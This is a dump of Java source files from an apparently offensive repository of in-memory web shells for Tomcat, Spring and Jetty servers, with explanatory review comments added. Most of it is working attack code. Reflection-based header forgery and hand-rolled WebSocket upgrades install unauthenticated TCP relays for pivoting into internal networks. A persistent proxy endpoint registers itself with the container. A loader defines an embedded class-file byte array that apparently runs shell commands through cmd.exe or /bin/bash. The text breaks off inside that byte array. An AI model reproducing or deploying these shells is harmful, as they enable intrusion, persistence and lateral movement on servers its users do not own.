     * RequestFacade/Request/coyote Request layout, presumably), removes any
     * existing value and adds the new one. Failures are only printed.
     */
    private void SetHeader(HttpServletRequest request, String key, String value) {
        Class requestClass = request.getClass();
        try {
            Field requestField = requestClass.getDeclaredField("request");
            requestField.setAccessible(true);
            Object requestObj = requestField.get(request);
            Field coyoteRequestField = requestObj.getClass().getDeclaredField("coyoteRequest");
            coyoteRequestField.setAccessible(true);
            Object coyoteRequestObj = coyoteRequestField.get(requestObj);
            Field headersField = coyoteRequestObj.getClass().getDeclaredField("headers");
            headersField.setAccessible(true);
            MimeHeaders headersObj = (MimeHeaders) headersField.get(coyoteRequestObj);
            headersObj.removeHeader(key);
            headersObj.addValue(key).setString(value);
        } catch (Exception e) {
/*
 * ProxyEndpoint.SetHeader, continued; then the injecting static block.
 */
            e.printStackTrace();
        }
    }
    /*
     * Static initializer: as in CmdEndpoint, request/response are literally
     * null here and would NPE on first use; presumably the injector
     * substitutes the live objects before loading — confirm.
     */
    static {
        HttpServletRequest request = null;
        HttpServletResponse response = null;
        // getSession() (not getSession(false)) creates an HTTP session.
        ServletContext servletContext = request.getSession().getServletContext();
        // Bound to the literal path "/x"; never registered with the container.
        ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(ProxyEndpoint.class, "/x").build();
        WsServerContainer container = (WsServerContainer) servletContext.getAttribute(ServerContainer.class.getName());
        Map pathParams = Collections.emptyMap();
        // Only used to reach the instance method SetHeader; the endpoint that
        // serves the connection is presumably created by the configurator.
        ProxyEndpoint proxyEndpoint = new ProxyEndpoint();
        // Re-adds Sec-WebSocket-Key with its own current value (a no-op if the
        // client sent it; if it did not, the header is added with a null
        // value — what MimeHeaders/UpgradeUtil do with that is not visible
        // here), then forges the three upgrade headers the client never sent.
        proxyEndpoint.SetHeader(request, "Sec-WebSocket-Key" , request.getHeader("Sec-WebSocket-Key"));
        proxyEndpoint.SetHeader(request,"Connection","Upgrade");
        proxyEndpoint.SetHeader(request,"Sec-WebSocket-Version","13");
        proxyEndpoint.SetHeader(request,"Upgrade","websocket");
        try {
            // Completes the handshake on the current connection; failures
            // are only printed.
            UpgradeUtil.doUpgrade(container, request, response, configEndpoint, pathParams);
        } catch (ServletException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
// --------------------------------------------------------------------------------
// /lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint2$1.class:
// --------------------------------------------------------------------------------
// https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint2$1.class
// --------------------------------------------------------------------------------
// /lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint2$2.class:
// --------------------------------------------------------------------------------
// https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint2$2.class
// --------------------------------------------------------------------------------
/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint2$Attach.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint2$Attach.class -------------------------------------------------------------------------------- /lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint2.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint2.class -------------------------------------------------------------------------------- /lib/exploit/websocket/BypassNginxCDN/ProxyEndpoint2.java: -------------------------------------------------------------------------------- 1 | import java.io.IOException; 2 | import java.io.PrintWriter; 3 | import java.util.*; 4 | import javax.servlet.ServletContext; 5 | import javax.servlet.http.HttpServletRequest; 6 | import javax.servlet.http.HttpServletRequestWrapper; 7 | import javax.servlet.http.HttpServletResponse; 8 | import javax.websocket.server.ServerContainer; 9 | import javax.websocket.server.ServerEndpointConfig; 10 | import org.apache.tomcat.websocket.server.WsServerContainer; 11 | import org.apache.tomcat.websocket.Constants; 12 | import javax.websocket.*; 13 | import org.apache.tomcat.websocket.server.WsHandshakeRequest; 14 | import org.apache.tomcat.websocket.WsHandshakeResponse; 15 | import java.nio.charset.StandardCharsets; 16 | import org.apache.tomcat.util.codec.binary.Base64; 17 | import org.apache.tomcat.util.security.ConcurrentMessageDigest; 18 | import org.apache.tomcat.websocket.Transformation; 19 | import org.apache.catalina.connector.RequestFacade; 20 | import org.apache.tomcat.websocket.server.WsHttpUpgradeHandler; 21 | import java.nio.ByteBuffer; 22 | import 
java.nio.channels.AsynchronousSocketChannel;
import java.net.InetSocketAddress;
import java.util.concurrent.Future;
import java.util.concurrent.TimeUnit;
import java.io.ByteArrayOutputStream;
import java.nio.channels.CompletionHandler;

/**
 * Same WebSocket-to-TCP forwarder as ProxyEndpoint (first frame = CONNECT-style
 * line naming host:port, later frames relayed raw, replies relayed back as
 * binary frames, no authentication). It differs only in the static block:
 * the handshake is done by hand and the request is unwrapped through any
 * HttpServletRequestWrapper before the Tomcat-specific upgrade.
 */
public class ProxyEndpoint2 extends Endpoint {
    // Frame counter for the session (instance field, reset in onOpen).
    long i =0;
    // Scratch accumulator for bytes read from the upstream socket.
    ByteArrayOutputStream baos = new ByteArrayOutputStream();
    // Session id -> upstream AsynchronousSocketChannel (raw types).
    HashMap map = new HashMap();
    /** Attachment for the async read: upstream socket + WebSocket session. */
    static class Attach {
        public AsynchronousSocketChannel client;
        public Session channel;
    }
    /**
     * Identical to ProxyEndpoint.readFromServer. buffer.clear() at the top of
     * completed() makes hasRemaining() always true, so the branch reduces to
     * result >= 0; on EOF (result == -1) nothing happens and nothing is
     * closed. Exceptions are swallowed.
     */
    void readFromServer(Session channel,AsynchronousSocketChannel client){
        final ByteBuffer buffer = ByteBuffer.allocate(50000);
        Attach attach = new Attach();
        attach.client = client;
        attach.channel = channel;
        client.read(buffer, attach, new CompletionHandler() {
            @Override
            public void completed(Integer result, final Attach scAttachment) {
                buffer.clear();
                try {
                    if(buffer.hasRemaining() && result>=0)
                    {
                        byte[] arr = new byte[result];
                        ByteBuffer b = buffer.get(arr,0,result);
                        baos.write(arr,0,result);
                        ByteBuffer q = ByteBuffer.wrap(baos.toByteArray());
                        if (scAttachment.channel.isOpen()) {
                            scAttachment.channel.getBasicRemote().sendBinary(q);
                        }
                        baos = new ByteArrayOutputStream();
                        readFromServer(scAttachment.channel,scAttachment.client);
                    }else{
                        if(result > 0)
                        {
                            byte[] arr = new byte[result];
                            ByteBuffer b = buffer.get(arr,0,result);
                            baos.write(arr,0,result);
                            readFromServer(scAttachment.channel,scAttachment.client);
                        }
                    }
                } catch (Exception ignored) {}
            }
            @Override
            public void failed(Throwable t, Attach scAttachment) {t.printStackTrace();}
        });
    }
    /**
     * Identical to ProxyEndpoint.process: frame 1 connects to host:port,
     * frames 2+ are written raw to the upstream socket. All errors are
     * swallowed.
     */
    void process(ByteBuffer z,Session channel)
    {
        try{
            if(i>1)
            {
                AsynchronousSocketChannel client = map.get(channel.getId());
                client.write(z).get();
                z.flip();
                z.clear();
            }
            else if(i==1)
/*
 * ProxyEndpoint2.process, continued: the first-frame "host:port" branch.
 */
            {
                // Platform-charset decode of the whole backing array; the
                // second space-separated token is taken as host:port.
                String values = new String(z.array());
                String[] array = values.split(" ");
                String[] addrarray = array[1].split(":");
                AsynchronousSocketChannel client = AsynchronousSocketChannel.open();
                int po = Integer.parseInt(addrarray[1]);
                InetSocketAddress hostAddress = new InetSocketAddress(addrarray[0], po);
                Future future = client.connect(hostAddress);
                try {
                    future.get(10, TimeUnit.SECONDS);
                } catch(Exception ignored){
                    // Connect failed/timed out: fake a 503; channel left open.
                    channel.getBasicRemote().sendText("HTTP/1.1 503 Service Unavailable\r\n\r\n");
                    return;
                }
                map.put(channel.getId(), client);
                readFromServer(channel,client);
                channel.getBasicRemote().sendText("HTTP/1.1 200 Connection Established\r\n\r\n");
            }
        }catch(Exception ignored){
        }
    }
    /**
     * Per-connection setup, identical to ProxyEndpoint.onOpen: 20 MiB message
     * buffers and a binary handler that clear()s the frame buffer (limit =
     * capacity) before handing it to process().
     */
    @Override
    public void onOpen(final Session session, EndpointConfig config) {
        i=0;
        session.setMaxBinaryMessageBufferSize(1024*1024*20);
        session.setMaxTextMessageBufferSize(1024*1024*20);
        session.addMessageHandler(new MessageHandler.Whole() {
            @Override
            public void onMessage(ByteBuffer message) {
                try {
                    message.clear();
                    i++;
                    process(message,session);
                } catch (Exception ignored) {
                }
            }
        });
    }
    /**
     * Peels HttpServletRequestWrapper layers (filter or framework wrappers)
     * until Tomcat's RequestFacade is reached; throws IllegalArgumentException
     * if the chain bottoms out in anything else. This is what lets the
     * variant work where CmdEndpoint2's bare cast would fail.
     */
    private static RequestFacade getRequestFacade(HttpServletRequest request) {
        if (request instanceof RequestFacade) {
            return (RequestFacade) request;
        }
        else if (request instanceof HttpServletRequestWrapper) {
            HttpServletRequestWrapper wrapper = (HttpServletRequestWrapper) request;
            HttpServletRequest wrappedRequest = (HttpServletRequest) wrapper.getRequest();
            return getRequestFacade(wrappedRequest);
        }
        else {
            throw new IllegalArgumentException("Cannot convert [" + request.getClass() + "] to org.apache.catalina.connector.RequestFacade");
        }
    }
    /**
     * RFC 6455 Sec-WebSocket-Accept: base64(SHA-1(key + the fixed GUID)).
     * NPEs on a null key; called below with the raw request header.
     */
    private static String getWebSocketAccept(String key) {
        byte[] WS_ACCEPT =
/*
 * ProxyEndpoint2.getWebSocketAccept, continued; then the injecting static
 * block with a hand-rolled handshake.
 */
                            "258EAFA5-E914-47DA-95CA-C5AB0DC85B11".getBytes(StandardCharsets.ISO_8859_1);
        byte[] digest = ConcurrentMessageDigest.digestSHA1(key.getBytes(StandardCharsets.ISO_8859_1), WS_ACCEPT);
        return Base64.encodeBase64String(digest);
    }
    /*
     * Static initializer. request/response are literally null here and
     * presumably get substituted by the injector — confirm. Unlike the other
     * variants this one grabs the response writer up front and, on failure,
     * prints the exception into the HTTP response (see the catch at the end).
     */
    static {
        HttpServletRequest request = null;
        HttpServletResponse response = null;
        PrintWriter out = null;
        try {
            out = response.getWriter();
        } catch (IOException e) {
            e.printStackTrace();
        }
        // getSession() (not getSession(false)) creates an HTTP session.
        ServletContext servletContext = request.getSession().getServletContext();
        // Bound to "/x"; never registered with the container.
        ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(ProxyEndpoint2.class, "/x").build();
        WsServerContainer container = (WsServerContainer) servletContext.getAttribute(ServerContainer.class.getName());
        Map pathParams = Collections.emptyMap();
        // Hand-rolled 101: Upgrade/Connection/Sec-WebSocket-Accept are set
        // without ever checking what the client sent; a missing
        // Sec-WebSocket-Key NPEs in getWebSocketAccept outside any try.
        response.setHeader(Constants.UPGRADE_HEADER_NAME, Constants.UPGRADE_HEADER_VALUE);
        response.setHeader(Constants.CONNECTION_HEADER_NAME, Constants.CONNECTION_HEADER_VALUE);
        response.setHeader(HandshakeResponse.SEC_WEBSOCKET_ACCEPT, getWebSocketAccept(request.getHeader("Sec-WebSocket-Key")));
        response.setStatus(101);
        WsHandshakeRequest wsRequest = new WsHandshakeRequest(request, pathParams);
        // Nothing the configurator puts on wsResponse is copied to response.
        WsHandshakeResponse wsResponse = new WsHandshakeResponse();
        configEndpoint.getConfigurator().modifyHandshake(configEndpoint, wsRequest, wsResponse);
        try {
            // No extensions, sub-protocol or transformation negotiated.
            List negotiatedExtensionsPhase2 = Collections.emptyList();
            Transformation transformation = null;
            String subProtocol = null;
            // Unwrap to the RequestFacade, then switch the connection to
            // Tomcat's WebSocket upgrade handler.
            RequestFacade requestFacade = getRequestFacade(request);
            WsHttpUpgradeHandler wsHandler = requestFacade.upgrade(WsHttpUpgradeHandler.class);
            if (wsHandler != null) {
                // Tomcat 8 preInit
                wsHandler.preInit(configEndpoint, container, wsRequest, negotiatedExtensionsPhase2, subProtocol, transformation, pathParams, request.isSecure());
                // Tomcat 7 preInit
                // Endpoint ep =
/*
 * ProxyEndpoint2 static initializer, continued. The next line is the rest of
 * the commented-out Tomcat 7 "Endpoint ep = ..." line and stays commented
 * out.
 */
//   (Endpoint)configEndpoint.getConfigurator().getEndpointInstance(configEndpoint.getEndpointClass());
                // wsHandler.preInit(ep, configEndpoint, container, wsRequest, negotiatedExtensionsPhase2, subProtocol, transformation, pathParams, request.isSecure());
            }
        }catch (Exception e) {
            // NOTE(review): the exception text goes into the HTTP response
            // body, so a failed upgrade tells the client why — and leaks
            // server internals to whoever triggered it.
            out.println(e.toString());
            out.flush();
            out.close();
        }
    }
}
// --------------------------------------------------------------------------------
// /lib/exploit/websocket/Tomcat_Spring_Jetty/WebSocket_Proxy.class:
// --------------------------------------------------------------------------------
// https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/Tomcat_Spring_Jetty/WebSocket_Proxy.class
// --------------------------------------------------------------------------------
// /lib/exploit/websocket/Tomcat_Spring_Jetty/WebSocket_Proxy.java:
// --------------------------------------------------------------------------------
import java.io.ByteArrayOutputStream;
import java.net.InetSocketAddress;
import java.nio.ByteBuffer;
import java.nio.channels.AsynchronousSocketChannel;
import java.nio.channels.CompletionHandler;
import java.util.HashMap;
import java.util.concurrent.Future;
import java.util.concurrent.TimeUnit;
import javax.servlet.*;
import javax.websocket.Endpoint;
import javax.websocket.EndpointConfig;
import javax.websocket.MessageHandler;
import javax.websocket.Session;
import javax.websocket.server.ServerContainer;
import javax.websocket.server.ServerEndpointConfig;

/**
 * Container-agnostic version of the TCP forwarder (only javax.servlet and
 * javax.websocket APIs, no Tomcat internals). Unlike the BypassNginxCDN
 * variants it is registered permanently with the container's ServerContainer
 * at a caller-chosen path (see addWs), so it survives as a real endpoint
 * until the webapp is reloaded. Configuration arrives through the
 * equals(Object)/toString() pair, which presumably is the loader's calling
 * convention (it passes a HashMap of byte[] values and reads "result" back)
 * — confirm against the loader. The relay logic itself is the same
 * unauthenticated CONNECT-style pivot as ProxyEndpoint.
 */
public final class WebSocket_Proxy extends Endpoint implements MessageHandler.Whole,CompletionHandler {

    private Session session;
    // Read from the parameter map but never used in this file.
    private String Pwd;
    // Endpoint path the shell is registered under.
    private String path;
    // Read from the parameter map but never used in this file.
    private String secretKey;
    private HashMap parameterMap;
    private ServletConfig servletConfig;
    private ServletContext servletContext;
/*
 * WebSocket_Proxy fields, continued.
 */
    // Single 100 KiB read buffer and single upstream socket shared by every
    // read this instance performs (see readFromServer/completed).
    final ByteBuffer buffer = ByteBuffer.allocate(102400);
    private AsynchronousSocketChannel client = null;
    // Frame counter for the session, reset in onOpen.
    long i = 0;
    ByteArrayOutputStream baos = new ByteArrayOutputStream();
    // Session id -> upstream socket (raw types).
    HashMap map = new HashMap();

    public WebSocket_Proxy() {}


    /**
     * Not an equality test. The loader (presumably) calls this with a HashMap
     * carrying "servletContext" plus byte[] values for "pwd", "path" and
     * "secretKey"; the method stores them on this instance and returns true,
     * or prints the exception and returns false.
     */
    public boolean equals(Object obj) {
        try {
            this.parameterMap = (HashMap)obj;
            this.servletContext = (ServletContext)this.parameterMap.get("servletContext");
            this.Pwd = get("pwd");
            this.path = get("path");
            this.secretKey = get("secretKey");
        } catch (Exception e) {
            e.printStackTrace();
            return false;
        }
        return true;
    }

    /**
     * Second half of the loader convention: performs the registration and
     * writes its outcome into the same map under "result", then drops the
     * map reference. Always returns "".
     */
    public String toString() {
        this.parameterMap.put("result", addWs().getBytes());
        this.parameterMap = null;
        return "";
    }

    /**
     * Registers this class as a WebSocket endpoint at {@code path} with the
     * container-provided ServerContainer. A ServletContext attribute named
     * after the path is used as the "already installed" marker (and is a
     * useful indicator to look for). Returns "success", "path err" when the
     * marker already exists, or "fail" when addEndpoint throws (swallowed).
     */
    public String addWs() {
        ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(this.getClass(), this.path).build();
        ServletContext x = (ServletContext) this.servletContext;
        ServerContainer container = (ServerContainer) x.getAttribute(ServerContainer.class.getName());
        try {
            if (x.getAttribute(this.path) == null){
                container.addEndpoint(configEndpoint);
                x.setAttribute(this.path,this.path);
                return "success";
            } else {
                return "path err";
            }
        } catch (Exception ignored) {
        }
        return "fail";
    }

    /**
     * Inbound binary frame: clear() (limit = capacity), count it, relay.
     * Errors are swallowed.
     */
    @Override
    public void onMessage(ByteBuffer message) {
        try {
            message.clear();
            i++;
            process(message,session);
        } catch (Exception ignored) {
        }
    }

    /**
     * Async read completion on the upstream socket. As in ProxyEndpoint,
     * buffer.clear() first makes hasRemaining() always true, so the branch
     * is effectively result >= 0; on EOF nothing happens and nothing is
     * closed. Uses the shared instance fields buffer/client/baos rather than
     * an attachment.
     */
    @Override
    public void completed(Integer result, final Session channel) {
        buffer.clear();
        try {
            if(buffer.hasRemaining() && result>=0)
            {
                byte[] arr = new byte[result];
                ByteBuffer b = buffer.get(arr,0,result);
                baos.write(arr,0,result);
                ByteBuffer q = ByteBuffer.wrap(baos.toByteArray());
                if (channel.isOpen()) {
/*
 * WebSocket_Proxy.completed, continued.
 */
                    channel.getBasicRemote().sendBinary(q);
                }
                baos = new ByteArrayOutputStream();
                readFromServer(channel,client);
            }else{
                if(result > 0)
                {
                    byte[] arr = new byte[result];
                    ByteBuffer b = buffer.get(arr,0,result);
                    baos.write(arr,0,result);
                    readFromServer(channel,client);
                }
            }
        } catch (Exception ignored) {
        }
    }
    @Override
    public void failed(Throwable t, Session channel) {t.printStackTrace();}

    /**
     * Arms one async read on the upstream socket into the shared buffer,
     * with this object as the completion handler. Overwrites this.client,
     * so only one upstream socket per instance is ever tracked here.
     */
    void readFromServer(Session channel,final AsynchronousSocketChannel client){
        this.client = client;
        buffer.clear();
        client.read(buffer, channel, this);
    }


    /**
     * Same protocol as ProxyEndpoint.process: frame 1 is "<verb> host:port
     * ..." and triggers a connect with a 10 s timeout (fake 200/503 text
     * frame in reply); frames 2+ are written raw to the upstream socket,
     * here followed by re-arming the read. Malformed input and all other
     * errors are silently swallowed.
     */
    void process(ByteBuffer z,Session channel)
    {
        try{
            if(i>1)
            {
                AsynchronousSocketChannel client = map.get(channel.getId());
                client.write(z).get();
                readFromServer(channel,client);
            }
            else if(i==1)
            {
                // Platform-charset decode of the whole backing array.
                String values = new String(z.array());
                String[] array = values.split(" ");
                String[] addrarray = array[1].split(":");
                AsynchronousSocketChannel client = AsynchronousSocketChannel.open();
                int po = Integer.parseInt(addrarray[1]);
                InetSocketAddress hostAddress = new InetSocketAddress(addrarray[0], po);
                Future future = client.connect(hostAddress);
                try {
                    future.get(10, TimeUnit.SECONDS);
                } catch(Exception ignored){
                    channel.getBasicRemote().sendText("HTTP/1.1 503 Service Unavailable\r\n\r\n");
                    return;
                }
                map.put(channel.getId(), client);
                readFromServer(channel,client);
                channel.getBasicRemote().sendText("HTTP/1.1 200 Connection Established\r\n\r\n");
            }
        }catch(Exception ignored){
        }
    }
    /**
     * Per-connection setup. NOTE(review): both message buffer limits are
     * raised to 1 GiB (1024*1024*1024) per session — a single large frame
     * can exhaust the heap.
     */
    @Override
    public void onOpen(final Session session, EndpointConfig config) {
        this.i = 0;
        this.session = session;
        session.setMaxBinaryMessageBufferSize(1024*1024*1024);
/*
 * WebSocket_Proxy.onOpen, continued.
 */
        session.setMaxTextMessageBufferSize(1024*1024*1024);
        session.addMessageHandler(this);
    }

    // The next five methods mirror the javax.servlet.Servlet contract, but
    // this class does not implement Servlet, so nothing here calls them;
    // they look like leftovers from a servlet-shaped template — confirm.
    public void init(ServletConfig paramServletConfig) throws ServletException {
        this.servletConfig = paramServletConfig;
    }

    public ServletConfig getServletConfig() {
        return this.servletConfig;
    }

    public String getServletInfo() {
        return "";
    }

    public void destroy() {}

    /**
     * Reads a byte[] entry from the parameter map and decodes it with the
     * platform charset; null if the key is absent, not a byte[], or the map
     * itself is null.
     */
    public String get(String key) {
        try {
            return new String((byte[])this.parameterMap.get(key));
        } catch (Exception e) {
            return null;
        }
    }
}
// --------------------------------------------------------------------------------
// /lib/exploit/websocket/Tomcat_Spring_Jetty/WsCmd.class:
// --------------------------------------------------------------------------------
// https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/Tomcat_Spring_Jetty/WsCmd.class
// --------------------------------------------------------------------------------
// /lib/exploit/websocket/Tomcat_Spring_Jetty/WsCmd.java:
// --------------------------------------------------------------------------------
import org.apache.catalina.core.StandardContext;
import org.apache.catalina.loader.WebappClassLoaderBase;
import org.apache.catalina.webresources.StandardRoot;
import org.apache.tomcat.websocket.server.WsServerContainer;
import javax.websocket.DeploymentException;
import javax.websocket.server.ServerContainer;
import javax.websocket.server.ServerEndpointConfig;
import java.lang.reflect.Field;
import java.lang.reflect.Method;

/**
 * Tomcat-specific loader whose entire behaviour lives in the static block,
 * i.e. it runs when the class is loaded. It locates the webapp's
 * StandardContext without a request object, via the thread context class
 * loader, and then (beyond this listing) defines an embedded class from a
 * byte[] whose first bytes are the 0xCAFEBABE class-file magic and whose
 * constant pool contains "cmd.exe", "/bin/bash", "-c" and
 * javax/websocket/Endpoint — i.e. another command-execution endpoint. The
 * static block continues past what is shown here.
 */
public class WsCmd {
    static {
        try {
            // Path the embedded endpoint is registered under.
            String urlPath = "/cmd";
            // Tomcat's webapp class loader exposes the resource root, and the
            // StandardRoot knows its Context — that is how the shell finds the
            // container without a request in scope.
            WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            StandardRoot standardroot = (StandardRoot) webappClassLoaderBase.getResources();
if (standardroot == null){ 18 | Field field; 19 | try { 20 | field = webappClassLoaderBase.getClass().getDeclaredField("resources"); 21 | field.setAccessible(true); 22 | }catch (Exception e){ 23 | field = webappClassLoaderBase.getClass().getSuperclass().getDeclaredField("resources"); 24 | field.setAccessible(true); 25 | } 26 | standardroot = (StandardRoot)field.get(webappClassLoaderBase); 27 | } 28 | StandardContext standardContext = (StandardContext) standardroot.getContext(); 29 | ClassLoader cl = Thread.currentThread().getContextClassLoader(); 30 | Class clazz; 31 | byte[] bytes = new byte[]{-54, -2, -70, -66, 0, 0, 0, 49, 0, 118, 10, 0, 30, 0, 46, 8, 0, 47, 10, 0, 48, 0, 49, 10, 0, 8, 0, 50, 8, 0, 51, 10, 0, 8, 0, 52, 10, 0, 53, 0, 54, 7, 0, 55, 8, 0, 56, 8, 0, 57, 10, 0, 53, 0, 58, 8, 0, 59, 8, 0, 60, 10, 0, 61, 0, 62, 7, 0, 63, 10, 0, 15, 0, 46, 10, 0, 64, 0, 65, 10, 0, 15, 0, 66, 10, 0, 64, 0, 67, 10, 0, 61, 0, 68, 9, 0, 29, 0, 69, 11, 0, 70, 0, 71, 10, 0, 15, 0, 72, 11, 0, 73, 0, 74, 7, 0, 75, 10, 0, 25, 0, 76, 11, 0, 70, 0, 77, 10, 0, 29, 0, 78, 7, 0, 79, 7, 0, 80, 7, 0, 82, 1, 0, 7, 115, 101, 115, 115, 105, 111, 110, 1, 0, 25, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 59, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 9, 111, 110, 77, 101, 115, 115, 97, 103, 101, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 1, 0, 6, 111, 110, 79, 112, 101, 110, 1, 0, 60, 40, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 59, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 67, 111, 110, 102, 105, 103, 59, 41, 86, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 41, 86, 1, 0, 9, 83, 105, 103, 110, 97, 116, 117, 114, 101, 1, 0, 
5, 87, 104, 111, 108, 101, 1, 0, 12, 73, 110, 110, 101, 114, 67, 108, 97, 115, 115, 101, 115, 1, 0, 84, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 59, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 36, 87, 104, 111, 108, 101, 60, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 62, 59, 12, 0, 34, 0, 35, 1, 0, 7, 111, 115, 46, 110, 97, 109, 101, 7, 0, 83, 12, 0, 84, 0, 85, 12, 0, 86, 0, 87, 1, 0, 7, 119, 105, 110, 100, 111, 119, 115, 12, 0, 88, 0, 89, 7, 0, 90, 12, 0, 91, 0, 92, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 1, 0, 7, 99, 109, 100, 46, 101, 120, 101, 1, 0, 2, 47, 99, 12, 0, 93, 0, 94, 1, 0, 9, 47, 98, 105, 110, 47, 98, 97, 115, 104, 1, 0, 2, 45, 99, 7, 0, 95, 12, 0, 96, 0, 97, 1, 0, 23, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 7, 0, 98, 12, 0, 99, 0, 100, 12, 0, 101, 0, 102, 12, 0, 103, 0, 35, 12, 0, 104, 0, 100, 12, 0, 32, 0, 33, 7, 0, 105, 12, 0, 106, 0, 108, 12, 0, 109, 0, 87, 7, 0, 111, 12, 0, 112, 0, 38, 1, 0, 19, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, 113, 0, 35, 12, 0, 114, 0, 115, 12, 0, 37, 0, 38, 1, 0, 10, 87, 101, 98, 83, 111, 99, 107, 101, 116, 67, 1, 0, 24, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 69, 110, 100, 112, 111, 105, 110, 116, 7, 0, 116, 1, 0, 36, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 36, 87, 104, 111, 108, 101, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 121, 115, 116, 101, 109, 1, 0, 11, 103, 101, 116, 80, 114, 111, 112, 101, 114, 116, 121, 1, 0, 38, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 
110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 11, 116, 111, 76, 111, 119, 101, 114, 67, 97, 115, 101, 1, 0, 20, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 10, 115, 116, 97, 114, 116, 115, 87, 105, 116, 104, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 90, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 1, 0, 10, 103, 101, 116, 82, 117, 110, 116, 105, 109, 101, 1, 0, 21, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 59, 1, 0, 4, 101, 120, 101, 99, 1, 0, 40, 40, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 1, 0, 14, 103, 101, 116, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 1, 0, 23, 40, 41, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 59, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109, 1, 0, 4, 114, 101, 97, 100, 1, 0, 3, 40, 41, 73, 1, 0, 6, 97, 112, 112, 101, 110, 100, 1, 0, 28, 40, 67, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 5, 99, 108, 111, 115, 101, 1, 0, 7, 119, 97, 105, 116, 70, 111, 114, 1, 0, 23, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 83, 101, 115, 115, 105, 111, 110, 1, 0, 14, 103, 101, 116, 66, 97, 115, 105, 99, 82, 101, 109, 111, 116, 101, 1, 0, 5, 66, 97, 115, 105, 99, 1, 0, 40, 40, 41, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 